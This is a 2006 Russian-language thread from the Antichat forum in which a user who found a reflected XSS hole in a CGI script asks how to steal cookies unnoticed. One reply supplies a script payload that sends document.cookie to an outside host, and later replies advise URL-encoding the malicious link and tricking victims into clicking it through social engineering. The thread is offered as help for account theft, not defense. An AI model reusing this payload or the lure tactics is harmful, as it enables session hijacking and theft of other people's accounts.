ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |

04.04.2006, 23:49
|
|
Познающий
Регистрация: 19.08.2005
Сообщений: 44
Провел на форуме: 103401
Репутация:
2
|
|
Подскажите по Xss
Нашел XSS уязвимость... в запросе .cgi файла... могу в хтмл-код внедрить любой другой хтмл код :-)
Что дальше сделать можно?
К примеру как беспалева потырить кукизы.. ведь не пошлешь же ты напрямую ссылку со скриптами 
Последний раз редактировалось Laggi; 04.04.2006 в 23:55..
|
|
|

05.04.2006, 03:05
|
|
Познающий
Регистрация: 01.03.2005
Сообщений: 80
Провел на форуме: 606375
Репутация:
12
|
|
|
|
|

05.04.2006, 03:09
|
|
Members of Antichat
Регистрация: 03.09.2005
Сообщений: 594
Провел на форуме: 3606217
Репутация:
685
|
|
Если можешь внедрить, так внедряй снифер и всё. Проблема то в чём, не знаешь как? вот, попробуй вставь вот это
Код:
<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
|
|
|

05.04.2006, 11:13
|
|
Познающий
Регистрация: 19.08.2005
Сообщений: 44
Провел на форуме: 103401
Репутация:
2
|
|
Сообщение от NaX[no]r†
Если можешь внедрить, так внедряй снифер и всё. Проблема то в чём, не знаешь как? вот, попробуй вставь вот это
Код:
<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
гммм... дело в том, что ХСС видимо пассивный, при гет запросе к примеру могу вставить:
patt="><script>alert(document.cookie)</script>
Вот... гм... как бы его протолкнуть...
|
|
|

05.04.2006, 17:48
|
|
Познавший АНТИЧАТ
Регистрация: 24.07.2005
Сообщений: 1,057
Провел на форуме: 1864132
Репутация:
116
|
|
СИ применить. Хотя весьма не надёжно.
|
|
|

05.04.2006, 18:21
|
|
Green member - Level 3
Регистрация: 08.10.2005
Сообщений: 396
Провел на форуме: 400609
Репутация:
239
|
|
__________________
Никому нельзя верить...
|
|
|

10.04.2006, 23:10
|
|
[ розовый мафиозо ]
Регистрация: 16.03.2005
Сообщений: 301
Провел на форуме: 1736355
Репутация:
241
|
|
1. переводиш ссылку со скриптом в ури кодировку, и методом СИ париш жертве.
2. поступаеш тем способом что описал я в статье про взлом аккаунтов на народе, или Censored про взлом аккаунтов на форуме Хакера, т.е. из пассива как бы делаеш актив.
3. побольше фантазии!!! ))
|
|
|

09.05.2006, 12:57
|
|
Познающий
Регистрация: 31.03.2006
Сообщений: 58
Провел на форуме: 163249
Репутация:
1
|
|
porter
Пример можешь показать как заныканой ссылкой пользоваться
|
|
|
|
 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|